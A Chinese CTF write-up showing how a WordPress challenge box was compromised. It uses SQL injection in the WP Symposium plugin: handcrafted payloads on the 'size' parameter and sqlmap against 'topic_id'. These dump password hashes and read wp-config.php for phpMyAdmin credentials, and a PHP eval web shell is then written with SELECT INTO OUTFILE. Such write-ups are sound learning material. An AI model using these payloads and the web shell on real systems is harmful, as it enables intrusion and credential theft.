0x00 信息收集 网址是一个wordpress博客。
既然是wp,直接用wpscan扫一扫。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 [+] We found 2 plugins: [+] Name: akismet | Latest version: 3.3.4 | Location: http://218.2.197.234:2040/wp-content/plugins/akismet/ [!] We could not determine a version so all vulnerabilities are printed out [!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS) Reference: https://wpvulndb.com/vulnerabilities/8215 Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/ Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html [i] Fixed in: 3.1.5 [+] Name: wp-symposium - v15.1 | Location: http://218.2.197.234:2040/wp-content/plugins/wp-symposium/ | Readme: http://218.2.197.234:2040/wp-content/plugins/wp-symposium/readme.txt [!] The version is out of date, the latest version is 15.8.1
找到了两个“过气”插件,存在漏洞。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 [!] Title: WP Symposium <= 15.1 - SQL Injection Reference: https://wpvulndb.com/vulnerabilities/7902 Reference: http://permalink.gmane.org/gmane.comp.security.oss.general/16479 Reference: http://packetstormsecurity.com/files/131801/ Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3325 Reference: https://www.exploit-db.com/exploits/37080/ [i] Fixed in: 15.4 [!] Title: WP Symposium <= 15.5.1 - Unauthenticated SQL Injection Reference: https://wpvulndb.com/vulnerabilities/8140 Reference: https://plugins.trac.wordpress.org/changeset/1214872/wp-symposium Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6522 Reference: https://www.exploit-db.com/exploits/37824/ [i] Fixed in: 15.8 [!] Title: WP Symposium <= 15.1 - Blind SQL Injection Reference: https://wpvulndb.com/vulnerabilities/8148 Reference: https://security.dxw.com/advisories/blind-sql-injection-in-wp-symposium-allows-unauthenticated-attackers-to-access-sensitive-data/ [i] Fixed in: 15.8
0x01 漏洞利用 CVE-2015-3325的sql注入是利用wp-symposium插件中的get_album_item.php。
1 2 3 4 5 6 7 8 9 10 <?php include_once ('../../../wp-config.php' ); global $wpdb ; $iid = $_REQUEST ['iid' ]; $size = $_REQUEST ['size' ]; $sql = "SELECT " .$size ." FROM " .$wpdb ->base_prefix."symposium_gallery_items WHERE iid = %d" ; $image = $wpdb ->get_var ($wpdb ->prepare ($sql , $iid )); header ("Content-type: image/jpeg" ); echo stripslashes ($image ); ?>
构造size参数,来进行sql查询,代码也没有过滤,但是在查询列名限制table_name的时候却没有返回,如果不限制table_name,会因为文件大小限制只显示1kb的内容,看不到wp_users的列名。
1 ?size=group_concat(column_name) FROM information_schema.columns WHERE table_schema=database() and table_name=%27users%27%20;%20--
无奈,放弃这个漏洞,看那个盲注的CVE。
https://www.exploit-db.com/exploits/37822/
topic_id参数存在盲注,访问对应页面,将post请求保存到文件中,用sqlmap来测试。(测试的时候没有删掉exp中的sleep函数,导致脚本多跑了好久。。。)
1 sqlmap -r "E:\1.txt" --dbs --level 3
1 2 3 4 5 available databases [4]: [*] information_schema [*] mysql [*] performance_schema [*] wordpress
表名
1 sqlmap -r "E:\1.txt" -D "wordpress" --tables
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 Database: wordpress [36 tables] +------------------------------+ | wp_commentmeta | | wp_comments | | wp_links | | wp_options | | wp_postmeta | | wp_posts | | wp_symposium_audit | | wp_symposium_cats | | wp_symposium_chat2 | | wp_symposium_chat2_typing | | wp_symposium_chat2_users | | wp_symposium_comments | | wp_symposium_events | | wp_symposium_events_bookings | | wp_symposium_extended | | wp_symposium_following | | wp_symposium_friends | | wp_symposium_gallery | | wp_symposium_gallery_items | | wp_symposium_group_members | | wp_symposium_groups | | wp_symposium_likes | | wp_symposium_lounge | | wp_symposium_mail | | wp_symposium_news | | wp_symposium_styles | | wp_symposium_subs | | wp_symposium_topics | | wp_symposium_topics_images | | wp_symposium_topics_scores | | wp_symposium_usermeta | | wp_term_relationships | | wp_term_taxonomy | | wp_terms | | wp_usermeta | | wp_users | +------------------------------+
列名
1 sqlmap -r "E:\1.txt" -D "wordpress" -T "wp_users" --columns
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 Database: wordpress Table: wp_users [10 columns] +---------------------+---------------------+ | Column | Type | +---------------------+---------------------+ | display_name | varchar(250) | | ID | bigint(20) unsigned | | user_activation_key | varchar(60) | | user_email | varchar(100) | | user_login | varchar(60) | | user_nicename | varchar(50) | | user_pass | varchar(64) | | user_registered | datetime | | user_status | int(11) | | user_url | varchar(100) | +---------------------+---------------------+
查询内容
1 sqlmap -r "E:\1.txt" -D "wordpress" -T "wp_users" -C "user_pass" --dump
1 2 3 4 5 +------------------------------------+ | user_pass | +------------------------------------+ | $P$BoRvgt/kaEDWqyiq0a3U8QjUQAO6gQ0 | +------------------------------------+
用CVE-2015-3325按照对应的表名列名也是能查到管理员。
1 ?size=group_concat(user_nicename,0x7e,user_pass) FROM wp_users%20;%20--
但是数据库中的管理员密码是强加密的,没办法解密。
之前扫到服务器还有一个phpmyadmin网页,可以从这里入手。
用sqlmap扫描phpmyadmin的密码。
1 sqlmap -r "E:\1.txt" --current-user --password
1 2 3 4 5 6 7 database management system users password hashes: [*] debian-sys-maint [1]: password hash: *AA59232D46C9C0751BA3069045A0B90F3C6431C4 [*] root [1]: password hash: *74ACCF7FB15CDBAEE88B9E7F7B58352D3308CFF2 [*] wordpress [1]: password hash: *A22BD9F95BF505E792C556FC1EF9FCFA6B6B5D9B
也是没有办法解密。。。
经过表哥提示,直接利用sqlmap读取wp的配置文件。
1 sqlmap -r "E:\1.txt" --file-read "/var/www/html/wp-config.php" -p "topic_id"
成功读取到phpmyadmin的账户密码。
Getshell 登陆到phpmyadmin,通过sql查询语句写入shell。
1 select '<?php @eval($_POST[adadminn])?>' INTO OUTFILE '/var/www/html/nibuhuicaidao.php' ;
报错:Can't create/write to file '/var/www/html/nibuhuicaidao.php' (Errcode: 13)
提示目录不可写。
用dirbuster工具爆破了一下目录,发现还有一个image的目录,测试,发现可写。
1 select '<?php @eval($_POST[adadminn])?>' INTO OUTFILE '/var/www/html/images/nibuhuicaidao.php' ;
菜刀链接,拿到flagflag{Hi_Web_fLaG_Is_HEre}。